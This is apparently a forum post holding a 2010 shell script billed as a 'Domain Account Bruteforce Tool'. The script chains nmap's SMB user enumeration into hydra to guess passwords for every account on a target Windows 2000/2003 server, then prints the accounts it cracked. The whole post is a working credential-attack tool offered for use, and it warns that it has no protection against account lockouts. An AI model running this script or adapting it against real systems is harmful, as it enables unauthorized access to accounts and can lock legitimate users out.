Search the Community

#!/bin/sh echo echo "*******************************************************" echo "* *" echo "* Welcome to the Domain Account Bruteforce Tool. *" echo "* By Sean gambles 21st Sep 2010 *" echo "*******************************************************" echo echo "This tool makes use of the nmap smb-enum-users script," echo "by basically exporting the results, in a cleaned up form" echo "into hydra for bruteforcing." echo echo "Currently, only working with server 2000, 2003 family." echo "This is due to server 2008 not allowing unauthenticated" echo "account enumeration." echo echo "*** Please observe account lockout thresholds before" echo "submitting your password file into this tool, as there" echo "is no protection against lockouts taking place. ***" echo echo "Please enter the target server IP :" read target echo "Please enter the path to your password file" echo "E.g /root/passwords.txt" read passfile echo "Enumerating users, please wait...." nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt #Cleans up the user list file by removing template accounts and computer names. cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt rm /root/nmap-users.txt echo "Trying passwords against all the user accounts, please wait...." hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt rm /root/users.txt echo "*********************************************************" echo echo "Domain accounts found :" echo cat results.txt |grep login: |cut -d" " -f6-11